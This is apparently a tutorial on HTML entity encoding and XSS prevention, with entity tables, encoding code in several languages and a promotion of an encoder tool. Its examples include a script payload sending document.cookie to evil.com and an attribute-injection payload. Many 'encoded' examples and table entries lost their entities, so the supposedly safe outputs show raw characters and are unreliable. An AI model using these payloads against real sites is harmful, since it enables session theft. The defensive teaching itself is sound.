is inserted into a page without encoding, the browser executes the script. HTML entity encoding converts the < and > characters to < and >, so the browser displays the text literally instead of executing it as code. This neutralizes the attack while preserving the visible content." } }, { "@type": "Question", "name": "Which HTML characters must always be encoded?", "acceptedAnswer": { "@type": "Answer", "text": "Five characters must always be encoded in HTML content: the ampersand (&) as &, the less-than sign (<) as <, the greater-than sign (>) as >, the double quote (\") as " (inside attribute values), and the single quote/apostrophe (') as ' or ' (inside attribute values). These characters are reserved in HTML syntax and will be misinterpreted if left unencoded." } }, { "@type": "Question", "name": "Is HTML entity encoding the same as URL encoding?", "acceptedAnswer": { "@type": "Answer", "text": "No, they are different encoding schemes for different contexts. HTML entity encoding (e.g., & for &) is used within HTML documents to represent special characters. URL encoding (also called percent-encoding, e.g., %26 for &) is used in URLs to encode characters that have special meaning in the URL syntax. Using the wrong encoding in the wrong context can lead to display errors or security vulnerabilities." } } ] }
HTML entities are special character sequences that represent reserved or non-keyboard characters within HTML documents. Every entity begins with an ampersand (&) and ends with a semicolon (;). Between these delimiters lies either a human-readable name (a named entity) or a numeric code point (a numeric entity) that tells the browser exactly which character to render.
The need for HTML entities arises from a fundamental tension in HTML's design: certain characters serve double duty. The less-than sign (<), for instance, is both a common mathematical symbol and the character that signals the start of every HTML tag. If you write <p> in your source code, the browser interprets it as a paragraph element. But what if you want to display the literal text "<p>" on your page? That is where entities come in -- you write <p>, and the browser renders the angle brackets as visible text instead of parsing them as markup.
HTML entities were part of the very first HTML specification and remain essential in modern web development. The HTML5 specification defines over 2,200 named character references, covering everything from basic punctuation to mathematical symbols, currency signs, arrows, emojis, and characters from dozens of writing systems. The full list is maintained in the WHATWG HTML Living Standard.
Beyond correctness, HTML entities are a critical component of web security. Properly encoding user-supplied content before inserting it into HTML is the primary defense against Cross-Site Scripting (XSS) attacks -- one of the most prevalent and dangerous classes of web vulnerabilities. Understanding how and when to use HTML entities is a fundamental skill for every web developer.
HTML entity encoding serves two critical purposes: ensuring correct rendering and preventing security vulnerabilities. Let us examine both.
HTML uses certain characters as part of its syntax. The five most important reserved characters are:
< (less-than) -- starts HTML tags> (greater-than) -- ends HTML tags& (ampersand) -- starts entity references" (double quote) -- delimits attribute values' (single quote / apostrophe) -- delimits attribute values
If you include these characters literally in your HTML content without encoding them, the browser will attempt to interpret them as markup rather than display them as text. This leads to broken layouts, missing content, and validation errors. For example, writing if (a < b && c > d) in an HTML document without encoding would cause the browser to try to parse < b && c > as an HTML tag, resulting in garbled output.
Cross-Site Scripting (XSS) is consistently ranked among the top web application vulnerabilities by OWASP. XSS attacks exploit the failure to properly encode user-supplied data before including it in HTML output. When an application takes user input -- such as a comment, username, or search query -- and inserts it directly into the page without encoding, an attacker can inject arbitrary HTML and JavaScript code.
Consider a simple search page that displays the user's query:
<!-- Vulnerable: unencoded user input -->
<p>You searched for: <script>document.location='https://evil.com/steal?cookie='+document.cookie</script></p>
If the search query is inserted without encoding, the browser executes the injected script, potentially stealing cookies, session tokens, or personal data. With proper HTML entity encoding, the same input becomes harmless:
<!-- Safe: encoded user input -->
<p>You searched for: <script>document.location='https://evil.com/steal?cookie='+document.cookie</script></p>
The browser displays the script tags as literal text instead of executing them. This is why output encoding is considered a fundamental security control -- it neutralizes injected code by ensuring that user-supplied data is always treated as data, never as code.
HTML entities also enable the correct display of characters that may not be available on all keyboards or in all character encodings. While modern web pages almost universally use UTF-8 (which can represent any Unicode character directly), entities remain useful for characters that are difficult to type, visually ambiguous in source code, or need to be explicitly identified for clarity. For instance, the non-breaking space ( ) is invisible but has distinct behavior from a regular space, and using the entity makes the developer's intent clear.
HTML supports three forms of character references: named entities, decimal numeric entities, and hexadecimal numeric entities. All three produce the same result in the browser, but they differ in readability, coverage, and use cases.
Named entities use a human-readable mnemonic between the & and ; delimiters. They are the most readable form and are preferred when available:
| Character | Named Entity | Description |
|---|---|---|
| & | & | Ampersand |
| < | < | Less-than sign |
| > | > | Greater-than sign |
| " | " | Double quotation mark |
| ' | ' | Apostrophe / single quote |
| © | © | Copyright sign |
| ® | ® | Registered sign |
| ™ | ™ | Trademark sign |
| Non-breaking space | |
| — | — | Em dash |
| – | – | En dash |
| … | … | Horizontal ellipsis |
Named entities are case-sensitive. & is valid, but & is not (though some browsers may handle it). The HTML5 specification defines over 2,200 named entities, but in practice, most developers use only a handful regularly.
Decimal numeric entities use the format &# followed by the character's Unicode code point in base-10, then ;. They can represent any Unicode character:
& → & (ampersand, U+0026)
< → < (less-than, U+003C)
> → > (greater-than, U+003E)
© → © (copyright, U+00A9)
€ → € (euro sign, U+20AC)
♥ → ♥ (heart suit, U+2665)
😀 → 😀 (grinning face, U+1F600)
Hexadecimal numeric entities use the format &#x followed by the character's Unicode code point in base-16, then ;. Many developers prefer this format because Unicode code points are conventionally written in hexadecimal (e.g., U+00A9):
& → & (ampersand)
< → < (less-than)
> → > (greater-than)
© → © (copyright)
€ → € (euro sign)
♥ → ♥ (heart suit)
😀 → 😀 (grinning face)
Use named entities for the five required characters (&, <, >, ", ') and common symbols like © and -- they are the most readable. Use numeric entities for characters that lack a named entity or when you need to specify an exact Unicode code point. Use hexadecimal numeric entities when working closely with Unicode references, as the hex format maps directly to U+XXXX notation.
While there are thousands of HTML entities, five characters are critical because they are reserved in HTML syntax. Failing to encode any of these when they appear in content or attributes can break your page or create security vulnerabilities.
&
The ampersand initiates every entity reference in HTML. If you write a literal & in your content, the browser's parser attempts to interpret what follows as an entity name. This can cause incorrect rendering or HTML validation errors. Always encode ampersands in URLs within HTML attributes:
<!-- Wrong: unencoded ampersand in URL -->
<a href="/search?q=cats&sort=date">Search</a>
<!-- Correct: encoded ampersand -->
<a href="/search?q=cats&sort=date">Search</a>
<
The less-than sign marks the beginning of an HTML tag. Any unencoded < in your content will cause the parser to attempt to interpret the following text as a tag name. This is the character most commonly exploited in XSS attacks, as it allows attackers to inject <script> tags.
>
The greater-than sign closes HTML tags. While browsers are generally more forgiving about unencoded > in content (since it only has meaning after an opening <), it should still be encoded for correctness, consistency, and to prevent edge-case parsing issues.
"Double quotes delimit most HTML attribute values. An unencoded double quote inside a double-quoted attribute value will prematurely terminate the attribute, potentially allowing an attacker to inject additional attributes or event handlers:
<!-- Vulnerable: unencoded quotes allow attribute injection -->
<input value="USER_INPUT" />
<!-- If USER_INPUT is: " onfocus="alert('XSS') -->
<!-- Result: -->
<input value="" onfocus="alert('XSS')" />
<!-- Safe: encoded quotes -->
<input value="" onfocus="alert('XSS')"" />
' or '
Single quotes can also delimit attribute values in HTML. While ' was historically not defined in HTML4 (only in XHTML and XML), it is fully supported in HTML5. For maximum compatibility, many developers prefer '. Either form is safe.
Cross-Site Scripting (XSS) remains one of the most widespread and dangerous web vulnerabilities. According to OWASP, XSS vulnerabilities are found in approximately two-thirds of all web applications. HTML entity encoding is the primary defense against reflected and stored XSS attacks.
XSS attacks exploit the fact that browsers cannot distinguish between legitimate markup written by the developer and malicious markup injected by an attacker -- unless the application properly encodes all dynamic content. There are three main types:
The principle is simple: encode all untrusted data before inserting it into HTML. "Untrusted data" includes anything that originates outside your application's codebase -- user input, URL parameters, database values, API responses, cookie values, and HTTP headers.
At minimum, encode the five critical characters:
Character Entity Purpose
--------- ------ -------
& & Prevents entity injection
< < Prevents tag injection
> > Prevents tag closure injection
" " Prevents attribute breakout
' ' Prevents attribute breakout
A critical concept in XSS prevention is that the correct encoding depends on where in the HTML document the untrusted data is being inserted. HTML entity encoding is correct for:
<p>ENCODED_DATA</p><div title="ENCODED_DATA">However, HTML entity encoding is NOT sufficient for:
\x3C for <)\003C for <)%3C for <)Using the wrong encoding for the wrong context is a common mistake that leaves applications vulnerable even when developers believe they have protected against XSS. The OWASP XSS Prevention Cheat Sheet provides comprehensive guidance on context-sensitive output encoding.
While HTML entity encoding is the primary defense, a robust security posture includes multiple layers:
Modern HTML pages use UTF-8 encoding, which can represent every character in the Unicode standard directly. This means you can include characters from any language, mathematical symbols, currency signs, and even emojis by simply typing them into your source code -- as long as your file is saved with UTF-8 encoding and the page declares <meta charset="UTF-8">.
However, HTML entities remain valuable for special characters in several scenarios:
| Category | Character | Entity | Description |
|---|---|---|---|
| Spaces | | Non-breaking space | |
| Spaces |   | En space | |
| Spaces |   | Em space | |
| Dashes | – | – | En dash |
| Dashes | — | — | Em dash |
| Quotes | ‘ | ‘ | Left single quote |
| Quotes | ’ | ’ | Right single quote |
| Quotes | “ | “ | Left double quote |
| Quotes | ” | ” | Right double quote |
| Currency | € | € | Euro sign |
| Currency | £ | £ | Pound sign |
| Currency | ¥ | ¥ | Yen sign |
| Math | × | × | Multiplication sign |
| Math | ÷ | ÷ | Division sign |
| Math | ≠ | ≠ | Not equal to |
| Math | ≤ | ≤ | Less than or equal |
| Math | ≥ | ≥ | Greater than or equal |
| Arrows | ← | ← | Left arrow |
| Arrows | → | → | Right arrow |
)The non-breaking space is perhaps the most commonly used HTML entity. Unlike a regular space, a non-breaking space prevents the browser from breaking a line at that position. It is useful for:
100 kmDr. Smith
However, overusing for layout purposes is an anti-pattern. Use CSS margin, padding, or white-space properties for spacing and layout control.
Unicode characters above U+FFFF (such as emojis and historic scripts) can be represented using numeric entities with their full code point value:
😀 → 😀 (grinning face)
💻 → 💻 (laptop)
🚀 → 🚀 (rocket)
🔒 → 🔒 (lock)
😀 → 😀 (same grinning face, decimal form)
While you can include these characters directly in UTF-8 source files, entities are useful when your editor or toolchain has trouble displaying or preserving them.
A common source of confusion is the distinction between HTML entity encoding and other forms of encoding used in web development. Each encoding scheme is designed for a specific context, and using the wrong one can lead to display errors or security vulnerabilities.
HTML entity encoding and URL encoding (percent-encoding) serve different purposes and must not be confused:
| Feature | HTML Entity Encoding | URL Encoding |
|---|---|---|
| Context | HTML documents | URLs and query strings |
| Format | &name; or &#num; | %XX (hex byte) |
| Ampersand | & | %26 |
| Less-than | < | %3C |
| Space | (non-breaking) | %20 or + |
| Specification | HTML Living Standard | RFC 3986 |
When placing a URL inside an HTML attribute, you may need both encodings. First, URL-encode the query parameters, then HTML-encode the entire URL for the attribute:
<!-- Step 1: URL-encode query parameters -->
https://example.com/search?q=cats%20%26%20dogs&page=1
<!-- Step 2: HTML-encode the URL for the href attribute -->
<a href="https://example.com/search?q=cats%20%26%20dogs&page=1">Search</a>
When inserting dynamic data into inline JavaScript, HTML entity encoding is not sufficient. The browser decodes HTML entities before passing the content to the JavaScript engine, which means an attacker can still inject code. Use JavaScript-specific encoding (e.g., \x3C for <) or, better yet, avoid inline scripts entirely and pass data through data attributes:
<!-- Avoid: inline JavaScript with dynamic data -->
<script>var name = "USER_INPUT";</script>
<!-- Better: use data attributes -->
<div id="app" data-name="ENCODED_USER_INPUT"></div>
<script>
var name = document.getElementById('app').dataset.name;
</script>
CSS has its own encoding scheme that uses backslashes followed by hexadecimal code points (e.g., \003C for <). This is relevant when untrusted data is inserted into CSS values, such as in style attributes or dynamically generated stylesheets. Again, the best approach is to avoid inserting dynamic data into CSS contexts entirely.
Every major programming language and web framework provides built-in functions for HTML entity encoding. Always use these library functions rather than writing your own encoding logic -- hand-rolled encoding is error-prone and likely to miss edge cases.
The browser DOM provides a built-in mechanism for safe HTML encoding through the textContent property:
// Safe: Using textContent (automatically encodes)
const userInput = '<script>alert("XSS")</script>';
element.textContent = userInput;
// Renders as literal text, not as a script
// Manual encoding function
function encodeHTML(str) {
return str
.replace(/&/g, '&')
.replace(/</g, '<')
.replace(/>/g, '>')
.replace(/"/g, '"')
.replace(/'/g, ''');
}
// Decoding HTML entities
function decodeHTML(str) {
const textarea = document.createElement('textarea');
textarea.innerHTML = str;
return textarea.value;
}
// UNSAFE: Never use innerHTML with untrusted data
element.innerHTML = userInput; // XSS vulnerability!
Note the order of replacements: the ampersand must be encoded first, otherwise it will double-encode the other entities (e.g., < would become &lt;).
Python's standard library provides the html module for encoding and decoding:
import html
# Encoding (escaping)
text = '<script>alert("XSS")</script>'
safe = html.escape(text)
print(safe)
# <script>alert("XSS")</script>
# By default, html.escape() does NOT encode single quotes
# Use quote=True to encode them
safe = html.escape(text, quote=True)
# Decoding (unescaping)
original = html.unescape('<p>Hello & welcome</p>')
print(original)
# <p>Hello & welcome</p>
# In web frameworks:
# Django: {{ variable }} auto-escapes by default
# Flask/Jinja2: {{ variable }} auto-escapes by default
# Use {{ variable|safe }} ONLY for trusted HTML content
PHP provides two main functions for HTML encoding:
// htmlspecialchars: encodes the 5 critical characters
$input = '<script>alert("XSS")</script>';
$safe = htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// <script>alert("XSS")</script>
// htmlentities: encodes ALL characters that have entity equivalents
$text = 'Price: 50€ © 2026';
$encoded = htmlentities($text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
// Price: 50€ © 2026
// Always specify ENT_QUOTES to encode both single and double quotes
// Always specify UTF-8 as the character encoding
// Decoding
$original = html_entity_decode($encoded, ENT_QUOTES | ENT_HTML5, 'UTF-8');
$original = htmlspecialchars_decode($safe, ENT_QUOTES);
Java's standard library does not include an HTML encoding method, but Apache Commons Text and the OWASP Java Encoder provide robust implementations:
// Apache Commons Text
import org.apache.commons.text.StringEscapeUtils;
String input = "<script>alert('XSS')</script>";
String safe = StringEscapeUtils.escapeHtml4(input);
// <script>alert('XSS')</script>
String original = StringEscapeUtils.unescapeHtml4(safe);
// OWASP Java Encoder (recommended for security)
import org.owasp.encoder.Encode;
String safeHtml = Encode.forHtmlContent(input);
String safeAttr = Encode.forHtmlAttribute(input);
String safeJs = Encode.forJavaScript(input);
String safeUrl = Encode.forUriComponent(input);
Go's html package provides basic encoding, and html/template provides context-aware auto-escaping:
package main
import (
"fmt"
"html"
)
func main() {
input := `<script>alert("XSS")</script>`
// Encoding
safe := html.EscapeString(input)
fmt.Println(safe)
// <script>alert("XSS")</script>
// Decoding
original := html.UnescapeString(safe)
fmt.Println(original)
// <script>alert("XSS")</script>
}
// In templates, html/template auto-escapes contextually:
// {{.UserInput}} is automatically escaped in HTML context
// Use template.HTML(trustedString) to mark content as safe
.NET provides System.Net.WebUtility and System.Web.HttpUtility for HTML encoding:
using System.Net;
string input = "<script>alert('XSS')</script>";
string safe = WebUtility.HtmlEncode(input);
// <script>alert('XSS')</script>
string original = WebUtility.HtmlDecode(safe);
// In Razor views, @ automatically HTML-encodes:
// @Model.UserInput is safe
// @Html.Raw(Model.TrustedHtml) bypasses encoding -- use with caution
Even experienced developers make encoding mistakes. Here are the most common pitfalls and how to avoid them.
Double encoding occurs when data that has already been encoded is encoded again. The result is that the entity markup itself appears in the rendered output instead of the intended character:
&amp; → displays as "&" instead of "&"
&lt; → displays as "<" instead of "<"
This happens when encoding is applied at multiple layers -- for example, once in the application code and again in the template engine. To avoid it, establish a clear encoding boundary: encode at the point of output (in the template), and ensure that the template engine is not also auto-encoding the same data.
URLs within HTML attributes commonly contain ampersands as query parameter separators. These must be encoded as & even though they are inside an attribute value:
<!-- Invalid HTML -->
<a href="/page?a=1&b=2&c=3">Link</a>
<!-- Valid HTML -->
<a href="/page?a=1&b=2&c=3">Link</a>
Browsers are forgiving about this and typically handle it correctly, but it is technically invalid HTML and can cause issues with validators and in edge cases where the text after & happens to match an entity name.
As discussed in the encoding contexts section, HTML entity encoding is only appropriate for HTML contexts. Using it in JavaScript, CSS, or URL contexts provides no security protection and may introduce vulnerabilities. Always match your encoding strategy to the output context.
A dangerous anti-pattern is filtering or sanitizing input on its way in, rather than encoding output on its way out. Input filtering is fragile -- attackers constantly find new encoding tricks, Unicode normalization exploits, and filter bypass techniques. Output encoding is robust because it applies the correct transformation at the exact point where the data transitions from a data context to a code context. Always encode at the point of output.
Many encoding functions only encode double quotes by default and skip single quotes. If your HTML uses single-quoted attribute values, or if an attacker can inject a single quote to break out of a context, this omission creates a vulnerability. Always ensure your encoding function handles both quote types.
innerHTML with Untrusted Data
In JavaScript, setting innerHTML on a DOM element parses the string as HTML and executes any scripts within it. Never use innerHTML with untrusted data. Use textContent for plain text, or use a sanitization library like DOMPurify if you must insert HTML:
// UNSAFE
element.innerHTML = userInput;
// SAFE: plain text
element.textContent = userInput;
// SAFE: sanitized HTML (using DOMPurify)
element.innerHTML = DOMPurify.sanitize(userInput);
Follow these guidelines to handle HTML entities correctly and maintain secure, well-formed HTML documents.
The most important principle in HTML encoding is to encode data at the point of output -- when it is being inserted into the HTML document. Do not rely on encoding or sanitizing data at the point of input. Data may be used in multiple contexts (HTML, JavaScript, SQL, URLs), and each context requires a different encoding. Encode when you render, not when you receive.
Modern web frameworks and template engines auto-escape HTML by default. Django, Jinja2, React (JSX), Angular, Vue.js, Go's html/template, and Razor all encode output automatically. Do not disable auto-escaping unless you have a specific need to output trusted HTML, and even then, sanitize it first.
At minimum, always encode &, <, >, ", and '. These five characters are sufficient to prevent XSS in HTML content and attribute contexts. For extra safety, consider encoding all non-alphanumeric characters as numeric entities.
Declare <meta charset="UTF-8"> in every HTML page, save source files in UTF-8, and ensure your server sends the Content-Type: text/html; charset=utf-8 header. With UTF-8, you can include most characters directly without entities, reducing the need for encoding and simplifying your source code.
Use the W3C Markup Validation Service to check your HTML for encoding errors. Common issues include unencoded ampersands in URLs, unencoded special characters in content, and invalid entity names. Valid HTML is more predictable and less likely to have rendering or security issues.
When you need to use an entity, prefer the named form when it exists. & is more readable than &, © is clearer than ©, and — is more meaningful than —. Readable source code is easier to review, maintain, and audit for security issues.
HTML entity encoding prevents browsers from interpreting characters as markup, but it does not sanitize HTML. If you need to accept and display user-supplied HTML (e.g., rich text from a WYSIWYG editor), use a dedicated HTML sanitization library like DOMPurify (JavaScript), Bleach (Python), or HtmlSanitizer (.NET). These libraries parse the HTML and remove dangerous elements and attributes while preserving safe formatting.
Test your application with known XSS payloads to verify that your encoding is working correctly. The OWASP XSS Filter Evasion Cheat Sheet provides an extensive collection of test vectors. Automated security scanning tools like OWASP ZAP can also detect encoding failures.
Our free HTML Entity Encoder & Decoder tool makes it easy to encode and decode HTML entities directly in your browser. No data is sent to any server -- all processing happens locally on your machine.
Paste any text containing special characters, and instantly get the HTML-encoded output. The tool encodes all five critical characters (&, <, >, ", ') and optionally encodes all non-ASCII characters as numeric entities. You can choose between named entities and numeric entities (decimal or hexadecimal).
Paste HTML-encoded text and see the decoded output immediately. The tool handles named entities, decimal numeric entities, and hexadecimal numeric entities. Invalid entities are highlighted with clear error messages.
Stop manually replacing special characters. Use our free tool to encode and decode HTML entities right in your browser -- with zero data sent to any server.
Try the HTML Entity Encoder NowMaster Base64 encoding and decoding. Learn the algorithm, common use cases, Base64URL differences, and code examples in 4 languages.
Learn JWT structure, claims, signing algorithms, and how to decode and verify tokens for secure authentication.
Master JSON syntax, formatting best practices, validation techniques, and common parsing errors.